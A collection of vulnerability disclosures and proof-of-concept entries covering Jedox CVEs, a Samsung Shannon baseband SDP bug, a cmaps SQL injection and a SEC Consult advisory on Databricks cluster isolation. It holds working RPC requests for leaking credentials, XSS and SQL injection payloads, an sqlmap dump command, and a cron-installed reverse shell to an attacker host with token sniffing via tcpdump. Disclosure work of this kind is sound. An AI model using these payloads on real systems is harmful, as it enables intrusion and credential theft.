<pre><code># Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls<br /># Date: 28/04/2023<br /># Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL<br /># Vendor Homepage: https://jedox.com<br /># Version: Jedox 2020.2 (20.2.5) and older<br /># CVE : CVE-2022-47874<br /><br /><br />Introduction<br />=================<br />Improper access controls in `/tc/rpc` allows remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection.<br /><br /><br />Write-Up<br />=================<br />See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.<br /><br /><br />Proof of Concept<br />=================<br />1) List all available database connections via `conn::ls` (see also: CVE-2022-47879):<br /><br /> PATH: /be/rpc.php<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "conn",<br /> "ls",<br /> [<br /> null,<br /> false,<br /> true,<br /> [<br /> "type",<br /> "active",<br /> "description"<br /> ]<br /> ]<br /> ]<br /> ]<br /><br />2) Retrieve details of a database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:<br /><br /> PATH: /tc/rpc<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "com.jedox.etl.mngr.Connections",<br /> "getGlobalConnection",<br /> [<br /> "<CONNECTION>"<br /> ]<br /> ]<br /> ]<br /><br /></code></pre>
<pre><code># Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts<br /># Date: 28/04/2023<br /># Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl<br /># Vendor Homepage: https://jedox.com<br /># Version: Jedox 2020.2 (20.2.5) and older<br /># CVE : CVE-2022-47876<br /><br /><br />Introduction<br />=================<br />Jedox Integrator allows remote authenticated users to create Jobs to execute arbitrary code via Groovy-scripts. To exploit the vulnerability, the attacker must be able to create a Groovy-Job in Integrator.<br /><br /><br />Write-Up<br />=================<br />See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.<br /><br /><br />Proof of Concept<br />=================<br />1) A user with appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following groovy script to execute `whoami`. The output of the command can be viewed in the logs:<br /><br /> def sout = new StringBuilder(), serr = new StringBuilder()<br /> def proc = 'whoami'.execute()<br /> proc.consumeProcessOutput(sout, serr)<br /> proc.waitForOrKill(10000)<br /> LOG.error(sout.toString());<br /> LOG.error(serr.toString());<br /><br /></code></pre>
<pre><code># Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path<br /># Date: 28/04/2023<br /># Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL<br /># Vendor Homepage: https://jedox.com<br /># Version: Jedox 2020.2 (20.2.5) and older<br /># CVE : CVE-2022-47878<br /><br /><br />Introduction<br />=================<br />Incorrect input validation for the default storage path variable in the settings page allows remote, authenticated users to specify the location as web root directory. Consecutive file uploads can lead to the execution of arbitrary code. To exploit the vulnerability, the attacker sets the default storage path to the web root.<br /><br /><br />Write-Up<br />=================<br />See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.<br /><br /><br />Proof of Concept<br />=================<br />1) In the UI in the application settings page the default storage path can be set to any value. This path could be set as the webroot directory of the webserver e.g. /htdocs/app/docroot/.<br /><br />2) Then any upload/import function can be used to upload a .php webshell file to the webroot.<br /><br />3) Execute webshell from the webroot directory to obtain RCE.<br /><br /></code></pre>
<pre><code># Exploit Title: Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module<br /># Date: 28/04/2023<br /># Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL<br /># Vendor Homepage: https://jedox.com<br /># Version: Jedox 2020.2 (20.2.5) and older<br /># CVE : CVE-2022-47877<br /><br /><br />Introduction<br />=================<br />A Stored cross-site scripting vulnerability allows remote authenticated users to inject arbitrary web scripts or HTML in the logs page via the log module. To exploit the vulnerability, the attacker must append an XSS payload to the log message.<br /><br /><br />Write-Up<br />=================<br />See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.<br /><br /><br />Proof of Concept<br />=================<br />1) Store log entry with XSS payload:<br /><br /> PATH: /ub/ccmd<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "log",<br /> "error",<br /> "<img src=# onerror=\"alert('XSS')\">"<br /> ]<br /> ]<br /><br />2) Trigger XSS payload by opening the Logs page and showing the respective log entry.<br /> <br /></code></pre>
<pre><code># Exploit Title: Jedox 2022.4.2 - Remote Code Execution via Directory Traversal<br /># Date: 28/04/2023<br /># Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL<br /># Vendor Homepage: https://jedox.com<br /># Version: Jedox 2022.4 (22.4.2) and older<br /># CVE : CVE-2022-47875<br /><br /><br />Introduction<br />=================<br />A Directory Traversal vulnerability in /be/erpc.php allows remote authenticated users to execute arbitrary code. To exploit the vulnerability, the attacker must have the permissions to upload files.<br /><br /><br />Write-Up<br />=================<br />See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.<br /><br /><br />Proof of Concept<br />=================<br />1) This vulnerability can be exploited by first uploading a file using one of the existing file upload mechanisms (e.g. Import in Designer). When uploading a file, the web application returns the file system path in the JSON body of the HTTP response (look for `fspath`).<br /><br />2) Upload a PHP file and note the file system path (`fspath`)<br /><br />3) Get RCE via Directory Traversal<br /><br /> PATH: /be/erpc.php?c=../../../../../fspath/of/uploaded/file/rce.php<br /> METHOD: POST<br /><br /></code></pre>
<pre><code># Exploit Title: Jedox 2022.4.2 - Code Execution via RPC Interfaces<br /># Date: 28/04/2023<br /># Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL<br /># Vendor Homepage: https://jedox.com<br /># Version: Jedox 2022.4 (22.4.2) and older<br /># CVE : CVE-2022-47879<br /><br /><br />Introduction<br />=================<br />A Remote Code Execution (RCE) vulnerability in /be/rpc.php and /be/erpc.php allows remote authenticated users to load arbitrary PHP classes from the rtn directory and to execute its methods. To exploit this vulnerability, the attacker needs knowledge about loadable classes, their methods and arguments.<br /><br /><br />Write-Up<br />=================<br />See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.<br /><br /><br />Proof of Concept<br />=================<br />1) The `Studio::getUserCreds` function can be used to read the clear text credentials of the currently authenticated user.<br /><br /> PATH: /be/rpc.php<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "Studio",<br /> "getUserCreds"<br /> ]<br /> ]<br /><br />2) Using function `conn::test_palo`, an outgoing HTTP connection can be initiated from the web server to an attacker controlled server (Specify HOST and PORT) with the authenticated user's credentials. This could leak cleartext credentials to an attacker.<br /><br /> PATH: /be/rpc.php<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "conn",<br /> "test_palo",<br /> [<br /> "<HOST>",<br /> "<PORT>",<br /> "",<br /> "",<br /> true,<br /> null<br /> ]<br /> ]<br /> ]<br /><br />3) The function `Studio::getExternURI` can be used to generate a URL with embedded username and encrypted password of the currently authenticated user.<br /><br /> PATH: /be/rpc.php<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "Studio",<br /> "getExternURI",<br /> [<br /> 0,<br /> "",<br /> [<br /> 0<br /> ],<br /> {<br /> "flag":1<br /> }<br /> ]<br /> ]<br /> ]<br /><br />4) List all available database connections via `conn::ls`:<br /><br /> PATH: /be/rpc.php<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "conn",<br /> "ls",<br /> [<br /> null,<br /> false,<br /> true,<br /> [<br /> "type",<br /> "active",<br /> "description"<br /> ]<br /> ]<br /> ]<br /> ]<br /><br />5) Retrieve details of individual database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:<br /><br /> PATH: /tc/rpc<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "com.jedox.etl.mngr.Connections",<br /> "getGlobalConnection",<br /> [<br /> "<CONNECTION>"<br /> ]<br /> ]<br /> ]<br /><br />6) Some functions return credentials only in encrypted form. However, they can be decrypted by any user using `common::decrypt` (specify encrypted credentials via ENCRYPTEDCREDS):<br /><br /> PATH: /be/rpc.php<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "common",<br /> "decrypt",<br /> [<br /> "<ENCRYPTEDCREDS>"<br /> ]<br /> ]<br /> ]<br /><br />7) Using `common::paloGet` it is possible to read arbitrary configuration parameters (specify config param via CONFIG. For example, the password of the SMTP server can be read with it (CONFIG: tasks.smtp.password):<br /><br /> PATH: /be/rpc.php<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "common",<br /> "paloGet",<br /> [<br /> null,<br /> "Config",<br /> "#_config",<br /> [<br /> "config"<br /> ],<br /> {<br /> "config": [<br /> "<CONFIG>"<br /> ]<br /> },<br /> true,<br /> true<br /> ]<br /> ]<br /> ]<br /><br />8) The function `palo_mgmt::sess_list` can be used to retrieve a list of all active user sessions. The session information includes not only the username but also the user's IP address, information about the browser and other data.<br /><br /> PATH: /be/rpc.php<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "palo_mgmt",<br /> "sess_list",<br /> [<br /> null<br /> ]<br /> ]<br /> ]<br /><br />9) The function `palo_mgmt::lic_users_list` returns a list of all users stored in the system:<br /><br /> PATH: /be/rpc.php<br /> METHOD: POST<br /> BODY:<br /> [<br /> [<br /> "palo_mgmt",<br /> "lic_users_list",<br /> [<br /> "0"<br /> ]<br /> ]<br /> ]<br /><br /></code></pre>
<pre><code>Shannon Baseband: Memory corruption when processing fmtp SDP attribute<br /><br />There is a memory corruption vulnerability that occurs when the baseband modem processes SDP when setting up a call. When an fmtp attribute is parsed, the integer that represents the payload type is copied into an 8-byte buffer using memcpy with the length of payload type as the length parameter. There are no checks that the payload type is less than 8-bytes long or actually an integer.<br /><br />I was not able to reproduce this bug, as most carrier SIP servers filter SDP that contains this error, however there is still risk that some servers won't filter this SDP, or a server gets compromised.<br /><br />A sample line of SDP that causes the problem is as follows:<br /><br /><br />a=fmtp:1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA00 0-15<br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2023-03-19.<br /><br /><br />Related CVE Numbers: CVE-2022-26496.<br /><br /><br /><br />Found by: natashenka@google.com<br /><br /></code></pre>
<pre><code># Exploit Title: Unauthenticated SQL injection<br />- Google Dork:<br />- Date: 27.04.2023<br />- Exploit Author: Lucas Noki (0xPrototype)<br />- Vendor Homepage: https://github.com/vogtmh<br />- Software Link: https://github.com/vogtmh/cmaps<br />- Version: 8.0<br />- Tested on: Mac, Windows, Linux<br />- CVE : CVE-2023-29809<br /><br />*Description:*<br /><br />The vulnerability found is an SQL injection. The `bookmap` parameter is vulnerable. When visiting the page: http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test we get the normal JSON response. However if a single quote gets appended to the value of the `bookmap` parameter we get an error message:<br />```html<br /><b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br /><br />```<br /><br />Now if two single quotes get appended we get the normal response without an error. This confirms the opportunity for sql injection. To really prove the SQL injection we append the following payload: <br />```<br />'-(select*from(select+sleep(2)+from+dual)a)--+<br />```<br /><br />The page will sleep for two seconds. This confirms the SQL injection.<br /><br />*Steps to reproduce:*<br /><br />1. Send the following payload to test the vulnerability: ```'-(select*from(select+sleep(2)+from+dual)a)--+```<br /><br />2. If the site slept for two seconds run the following sqlmap command to dump the whole database including the ldap credentials.<br /> ```shell<br /> python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump<br /> ```<br /><br />Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.<br /><br /><br /><br />## Request to the server:<br /><br /><img src="Screenshot 2023-04-30 at 22.23.51.png" alt="Screenshot 2023-04-30 at 22.23.51" style="zoom:50%;" /><br /><br />## Response from the server:<br /><br />Look at the response time.<br /><br /><img src="Screenshot 2023-04-30 at 22.24.35.png" alt="Screenshot 2023-04-30 at 22.24.35" style="zoom:50%;" /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230502-0 ><br />=======================================================================<br /> title: Bypassing cluster isolation through insecure defaults and<br /> shared storage<br /> product: Databricks Platform<br /> vulnerable version: PaaS version as of 2023-01-26<br /> fixed version: Current PaaS version<br /> CVE number: -<br /> impact: critical<br /> homepage: https://www.databricks.com<br /> found: 2023-01-20<br /> by: Florian Roth (Atos)<br /> Marius Bartholdy (SEC Office Berlin)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult.<br /> SEC Consult is part of Eviden, an atos business<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Databricks Data Science & Engineering (sometimes called simply "Workspace")<br />is an analytics platform based on Apache Spark. It is integrated with Azure to<br />provide one-click setup, streamlined workflows, and an interactive workspace<br />that enables collaboration between data engineers, data scientists, and<br />machine learning engineers."<br /><br />Source: https://learn.microsoft.com/en-us/azure/databricks/scenarios/what-is-azure-databricks-ws<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor disabled legacy scripts and migrated cluster-scoped scripts from<br />DBFS to WSFS. Affected customers received migration instructions.<br /><br />SEC Consult highly recommends to perform a thorough security review of the<br />product conducted by security professionals to identify and resolve potential<br />further security issues.<br /><br />We have also written a blog post in collaboration with Elia Florio, Sr. Director<br />of Detection & Response at Databricks and Florian Roth and Marius Bartholdy,<br />security researchers with SEC Consult. It can be found here:<br />https://r.sec-consult.com/databr<br /><br />Furthermore, a proof of concept demo video has been published here (Youtube):<br />https://r.sec-consult.com/dbyoutube<br /><br /><br />Databricks concepts:<br />--------------------<br />Concept 1: Databricks File System (DBFS):<br /><br />"The Databricks File System (DBFS) is a distributed file system mounted into a<br /> Databricks workspace and available on Databricks clusters. DBFS is an<br />abstraction on top of scalable object storage that maps Unix-like filesystem<br />calls to native cloud storage API calls."<br /><br />Source: https://docs.databricks.com/dbfs/index.html<br /><br />Therefore developers can easily handle files as if they were local to a compute<br />cluster although they actually reside in a cloud storage.<br /><br />The recommended way to interact with the DBFS is from within a notebook by using<br />the Databricks Utilities (dbutils). The following command could be used to list<br />the content of a directory:<br />===============================================================================<br />display(dbutils.fs.ls("dbfs:/databricks/scripts"))<br />===============================================================================<br /><br />For further information see: https://learn.microsoft.com/en-us/azure/databricks/dbfs/<br /><br /><br />Concept 2: Init Scripts:<br /><br />Databricks uses a feature called "init script" to customize compute clusters.<br />They can be used to install dependencies or to configure advanced network<br />settings. These are shell scripts that run during the startup of each cluster.<br /><br />There are different types of init scripts:<br /><br />(I) Cluster-scoped init scripts only run on the specified cluster and have to be<br />setup by the cluster owner. Before using a cluster-scoped script it has to be<br />uploaded to the DBFS. In the cluster configuration it is then referenced by its<br />file path, e.g dbfs:/databricks/scripts/init-health-check.sh<br /><br />(II) Global init scripts run on every cluster and have to be configured by an<br />administrative user. Their storage location is not disclosed.<br /><br />(III) Legacy global init scripts are theoretically deprecated. However, they are<br />enabled by default, even on newly created workspaces. The main difference to<br />the newer global init scripts is that they are stored on the DBFS in a fixed<br />location at dbfs:/databricks/init.<br /><br />For further information see: https://learn.microsoft.com/en-us/azure/databricks/clusters/init-scripts<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Bypassing cluster isolation through insecure defaults and shared storage<br /><br />A low-privilege user is able to break the isolation between Databricks compute<br />clusters and take over any cluster in a workspace as long as they are allowed<br />to run notebooks. Due to an insecure default configuration combined with<br />insufficient access control, it is possible to gain remote code execution on all<br />clusters of a workspace. With such an access, it is possible to leak secrets and<br />to escalate privileges to those of a workspace administrator.<br /><br /><br />Attack scenario:<br />The DBFS is accessible by every user in a Databricks workspace. All files stored<br />here are visible to anyone in the workspace. Cluster-scoped and legacy global<br />init scripts are stored here.<br /><br />An authenticated attacker with the lowest possible permissions in a Databricks<br />workspace could run a notebook to:<br /><br />1. Find and modify an existing cluster-scoped init script.<br />2. Place a new script in the default location for legacy global init scripts.<br /><br />Both attacks lead to the take over of the compute cluster resources and enable<br />further attacks. Firstly, any secrets stored can be read and, secondly,<br />workspace administrator tokens can be stolen as demonstrated by Joosua<br />Santasalo from Secureworks.<br /><br />See: https://www.databricks.com/blog/2022/10/10/admin-isolation-shared-clusters.html<br /><br /><br />Proof of concept:<br />-----------------<br />1) Bypassing cluster isolation through insecure defaults and shared storage<br />a) Preparations:<br /><br />For this POC a new Azure Databricks workspace was created with the "premium"<br />pricing tier. It includes an administrative user (databricks-workspace-admin)<br />as well as a newly added low-privileged user (databricks-user) with the default<br />permissions "Workspace access" and "Databricks SQL access". These are the fewest<br />possible permissions a user can have.<br /><br />To demonstrate both attack scenarios, three clusters were created:<br /><br />1. Cluster on which the databricks-user has permissions to run notebooks<br /> ("Can attach to")<br />2. Cluster for the databricks-workspace-admin with a cluster-scoped init script<br /> already configured.<br />3. Cluster for the databricks-workspace-admin with NO init script<br /><br />The databricks-user does not have access to the clusters 2 and 3.<br />They cannot even see them in the portal.<br /><br />For the cluster 2 (with a pre-configured init script) the following notebook<br />code was used by the databricks-workspace-admin to create an init script which<br />simply writes example output to /tmp/init-health-check-success.txt:<br /><br />===============================================================================<br />dbutils.fs.mkdirs("dbfs:/databricks/scripts/")<br />dbutils.fs.put("/databricks/scripts/init-health-check.sh","""<br />#!/bin/bash<br />echo 'Init health check: successful > /tmp/init-helth-check-success.txt' """, True)<br />display(dbutils.fs.ls("dbfs:/databricks/scripts/init-health-check.sh"))<br />===============================================================================<br /><br />After that the script was applied to cluster 2 as a cluster-scoped init script.<br /><br />To show the impact of this attack in a more tangible way a keyvault-backed<br />secret scope as well as a databricks-backed secret scope were also created.<br />Their secrets were then used in the spark configuration and in the environment<br />variables of cluster 2 and 3.<br /><br />===============================================================================<br />Spark configuration:<br />databricks-backed-secret {{secrets/databricks-backed-secret-scope/databricks-backed-secret}}<br />azure-keyvault-backed-secret {{secrets/key-vault-backed-secret-scope/azure-keyvault-backed-secret}}<br /><br />Environment variables:<br />databricks_backed_secret_in_environment={{secrets/databricks-backed-secret-scope/databricks-backed-secret-in-environment}}<br />azure_keyvault_backed_secret_in_environment={{secrets/key-vault-backed-secret-scope/azure-keyvault-backed-secret-in-environment}}<br />===============================================================================<br /><br />These serve only as examples. On a real productive compute cluster they could be used to<br />connect to additional cloud storage as described here:<br />https://learn.microsoft.com/en-us/azure/databricks/external-data/azure-storage#--access-azure-data-lake-storage-gen2-or-blob-storage-using-oauth-20-with-an-azure-service-principal<br /><br /><br />b) Attack via pre-existing init script:<br /><br />The attacker starts by viewing the content of the DBFS with the following code:<br />===============================================================================<br />display(dbutils.fs.ls("dbfs:/databricks"))<br />display(dbutils.fs.ls("dbfs:/databricks/scripts"))<br />===============================================================================<br /><br />All found .sh files could potentially be cluster-scoped init scripts applied to<br />clusters that the attacker is not aware of. It is not possible to overwrite<br />existing scripts, they can however be renamed or deleted. The cluster<br />configuration is only aware of the script names. Therefore, a newly created<br />script with the same name will be executed. Such a malicious file was created.<br />It includes a reverse shell that will continually attempt to connect to the<br />attacker's server.<br /><br />===============================================================================<br /> # rename file<br />dbutils.fs.mv("/databricks/scripts/init-health-check.sh",<br />"/databricks/scripts/init-health-check.sh.old")<br />#write new file with malicious content<br />dbutils.fs.put("/databricks/scripts/init-health-check.sh","""<br />#!/bin/bash<br />crontab -l > mycron<br />echo "* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACKER/8091 0>&1'" >> mycron<br />crontab mycron<br />rm mycron<br />""", True)<br />===============================================================================<br /><br />As soon as the init script is triggered again, for example via a cluster restart,<br />a reverse shell connection, with root privileges on the compute cluster, is<br />received:<br /><br />===============================================================================<br />user@$ATTACKER:~$ nc -lnkvp 8091<br />Listening on [0.0.0.0] (family 0, port 8091)<br />Connection from $TARGET 48518 received!<br />bash: cannot set terminal process group (21384): Inappropriate ioctl for device<br />bash: no job control in this shell<br />root@0121-110521-h6l5h1n2-10-139-64-5:~# id<br />id<br />uid=0(root) gid=0(root) groups=0(root)<br />root@0121-110521-h6l5h1n2-10-139-64-5:~# uname -a<br />uname -a<br />Linux 0121-110521-h6l5h1n2-10-139-64-5 5.4.0-1090-azure #95~18.04.1-Ubuntu SMP Sun Aug 14 20:09:27 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux<br />root@0121-110521-h6l5h1n2-10-139-64-5:~#<br />===============================================================================<br /><br /><br />c) Attack via legacy global init script:<br /><br />The legacy global init script is enabled by default, therefore an attacker could<br />assume it is turned on and place a script in the default location at<br />dbfs:/databricks/init.<br /><br />===============================================================================<br />dbutils.fs.mkdirs("dbfs:/databricks/init/")<br />dbutils.fs.put("dbfs:/databricks/init/global-init.sh"""<br />#!/bin/bash<br />crontab -l > mycron<br />echo "* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACKER/8091 0>&1'" >> mycron<br />crontab mycron<br />rm mycron<br />""", True)<br />===============================================================================<br /><br />Global init scripts apply to every existing compute cluster. Every cluster will<br />establish a reverse shell now as soon as the script is triggered again. With<br />this attack it is possible to attack compute clusters even if they do not have<br />a cluster-scoped init script set up.<br /><br />===============================================================================<br />user@$ATTACKER:~$ nc -lnkvp 8091<br />Listening on [0.0.0.0] (family 0, port 8091)<br />Connection from $TARGET 53910 received!<br />bash: cannot set terminal process group (988): Inappropriate ioctl for device<br />bash: no job control in this shell<br />root@0121-111747-cmijb28n-10-139-64-4:~# id<br />id<br />uid=0(root) gid=0(root) groups=0(root)<br />root@0121-111747-cmijb28n-10-139-64-4:~# uname -a<br />uname -a<br />Linux 0121-111747-cmijb28n-10-139-64-4 5.4.0-1100-azure #106~18.04.1-Ubuntu SMP Mon Dec 12 21:49:35 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux<br />root@0121-111747-cmijb28n-10-139-64-4:~#<br />===============================================================================<br /><br /><br />Impact:<br /><br />a) Leaking sensitive information in environment variables and the configuration:<br /><br />Secrets configured in the keyvault-backed secret scope can only be retrieved at<br />runtime by the compute instance itself via a managed identity. Even Databricks<br />workspace administrators cannot read them directly. They are however available<br />to the compute cluster as soon as it is initialized. With remote code execution<br />and root privileges an attacker is able to read the plain text secrets of any<br />cluster.<br /><br />Spark configuration secrets can be found at /tmp/custom-spark.conf:<br /><br />===============================================================================<br />root@0121-111747-cmijb28n-10-139-64-4:/tmp# cat custom-spark.conf<br />cat custom-spark.conf<br />spark.databricks.unityCatalog.enforce.permissions false<br />spark.driver.host 10.139.64.6<br />spark.databricks.secret.envVar.keys.toRedact ZGF0YWJyaWNrc19iYWNrZWRfc2VjcmV0X2luX2Vudmlyb25tZW50,YXp1cmVfa2V5dmF1bHRfYmFja2VkX3NlY3JldF9pbl9lbnZpcm9ubWVudA==<br />spark.driver.tempDirectory /local_disk0/tmp<br />spark.databricks.delta.preview.enabled true<br />spark.databricks.wsfsPublicPreview true<br />databricks-backed-secret databricks-backed-secret-value <- THIS IS A SECRET<br />spark.databricks.secret.sparkConf.keys.toRedact ZGF0YWJyaWNrcy1iYWNrZWQtc2VjcmV0,YXp1cmUta2V5dmF1bHQtYmFja2VkLXNlY3JldA==<br />spark.databricks.mlflow.autologging.enabled true<br />spark.executor.tempDirectory /local_disk0/tmp<br />spark.databricks.enablePublicDbfsFuse false<br />spark.databricks.workspaceUrl adb-8690126810713062.2.azuredatabricks.net<br />spark.master local[*, 4]<br />azure-keyvault-backed-secret azure-keyvault-backed-secret-value <- THIS IS A SECRET<br />spark.databricks.cloudfetch.hasRegionSupport true<br />spark.databricks.unityCatalog.enabled true<br />spark.databricks.automl.serviceEnabled true<br />spark.databricks.cluster.profile singleNode<br />root@0121-111747-cmijb28n-10-139-64-4:/tmp#<br />===============================================================================<br /><br />In order to read secrets in the environment variables, an attacker would need<br />to access the environment of the right process. With root privileges, they are<br />able to access all processes' environments by reading the corresponding<br />/proc/<process-id>/environ file. For simplicity however, the right process-id<br />(888) was used in this POC:<br /><br />===============================================================================<br />root@0121-110521-h6l5h1n2-10-139-64-5:~# cat /proc/888/environ<br />SHELL=/bin/bash[...]<br />TERM=xterm-256color<br />USER=root<br />SPARK_PUBLIC_DNS=10.139.64.6<br />azure_keyvault_backed_secret_in_environment=<br />azure-keyvault-backed-secret-in-envionment-value <- THIS IS A SECRET<br />SPARK_LOCAL_DIRS=/local_disk0SHLVL=1<br />MASTER=local[4]<br />SPARK_HOME=/databricks/spark<br />SPARK_LOCAL_IP=10.139.64.6<br />MLFLOW_CONDA_HOME=/databricks/conda<br />CLASSPATH=/databricks/spark/dbconf/jets3t/:/databricks/spark/dbconf/log4j/driver:/databricks/hive/conf:/databricks/spark/dbconf/hadoop:/databricks/jars/*<br />SPARK_CONF_DIR=/databricks/spark/conf<br />SPARK_DIST_CLASSPATH=/databricks/spark/dbconf/log4j/driver:/databricks/jars/*<br />PYENV_ROOT=/databricks/.pyenv<br />DATABRICKS_LIBS_NFS_ROOT_PATH=/local_disk0/.ephemeral_nfs<br />SPARK_ENV_LOADED=1<br />DATABRICKS_CLUSTER_LIBS_ROOT_DIR=cluster_libraries<br />PATH=/databricks/.pyenv/bin:/usr/local/nvidia/bin:/databricks/python3/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin<br />DATABRICKS_LIBS_NFS_ROOT_DIR=.ephemeral_nfsSUDO_UID=0<br />DATABRICKS_CLUSTER_LIBS_PYTHON_ROOT_DIR=python<br />SPARK_SCALA_VERSION=2.12<br />MAIL=/var/mail/root<br />databricks_backed_secret_in_environment=<br />database-backed-secret-in-environment-value <- THIS IS A SECRET<br />SCALA_VERSION=2.10PTY_LIB_FOLDER=/usr/lib/libptyOLDPWD=/databricks/chauffeurSPARK_WORKE<br />===============================================================================<br /><br /><br />b) API Token leak and privilege escalation:<br /><br />Using a vulnerability initially found by Joosua Santasalo from Secureworks it is<br />possible to leak Databricks API tokens of other users, including administrators.<br />The previously proposed hardening technique "Use cluster types that support user<br />isolation wherever possible." does not mitigate the initial vulnerability as<br />all compute cluster types are affected by our new vulnerability.<br />Source: https://www.databricks.com/blog/2022/10/10/admin-isolation-shared-clusters.html<br /><br />It is thereby possible to impersonate any user and to gain privileges of a<br />workspace administrator.<br /><br />Using the previously established reverse-shell it is possible to capture<br />control-plane traffic with the following command. As soon as a task is started<br />with the administrative user, for example running a simple notebook, the token<br />is sent unencrypted and could be leaked.<br /><br />(Make sure to verify that you are on the correct cluster when reproducing the<br />issue using the global init script attack vector since the user cluster will<br />also be attacked and send a shell too. This confused us more often than we<br />would like to admit.)<br /><br />===============================================================================<br />root@0121-110521-h6l5h1n2-10-139-64-5:~# /usr/sbin/tcpdump -i any -Aq | grep -i 'apiToken'<br />/usr/sbin/tcpdump -i any -Aq | grep -i 'apiToken'<br />tcpdump: verbose output suppressed, use -v or -vv for full protocol decode<br />listening on any, link-type LINUX_SLL (Linux cooked v1), capture size 262144 bytes<br />{"apiToken":"dkea****************************a107","procStartTime":53444,"commandOrigin":"PythonDriver","commandId":"7712608268853321788_7012126414451989966_5680a35d486f42ac922d461b93b8b7bf","notebookDir":"/Users/databricks-workspace-admin@redacted.onmicrosoft.com"}<br />apiToken<br />{"apiToken":"dkea****************************a107","procStartTime":85732,"commandOrigin":"PythonWorker","commandId":"7712608268853321788_7012126414451989966_5680a35d486f42ac922d461b93b8b7bf","notebookDir":"/Users/databricks-workspace-<br />. . .<br />===============================================================================<br /><br />This apiToken could then be used in the Databricks CLI or with the REST API<br />directly. The following example request needed administrative privileges to<br />succeed:<br /><br />===============================================================================<br />└─$ curl -s https://adb-redacted.2.azuredatabricks.net/api/2.0/secrets/scopes/list -H 'Authorization: Bearer dkea****************************a107' | jq<br />{<br /> "scopes": [<br /> {<br /> "name": "databricks-backed-secret-scope",<br /> "backend_type": "DATABRICKS"<br /> },<br /> {<br /> "name": "key-vault-backed-secret-scope",<br /> "backend_type": "AZURE_KEYVAULT",<br /> "keyvault_metadata": {<br /> "resource_id": "/subscriptions/714984c7-3ed0-4de2-b23b-9cffd28b74f7/resourceGroups/rg-databricks-proof-of-concept/providers/Microsoft.KeyVault/vaults/redacted-databricks-poc",<br /> "dns_name": "https://redacted-databricks-poc.vault.azure.net/"<br /> }<br /> }<br /> ]<br />}<br />===============================================================================<br /><br />Additional scenarios are possible once RCE is achieved, for example by using the<br />managed identity of the compute clusters to get an access token via the instance<br />metadata service at http://169.254.169.254/metadata/identity/oauth2/token.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The latest Databricks PaaS offering was tested on Azure as well as Amazon Web<br />Services (AWS) with the "Premium" pricing tier as of 2023-01-26.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2023-01-26: Contacting vendor PGP-encrypted through security@databricks.com<br />2023-01-26: Vendor acknowledged the email and is reviewing the reports<br />2023-02-15: Vendor confirms all vulnerabilities and is working on a solution<br />2023-03-29: Vendor proposes a solution<br />2023-05-02: Coordinated release of security advisory<br /><br /><br />Solution:<br 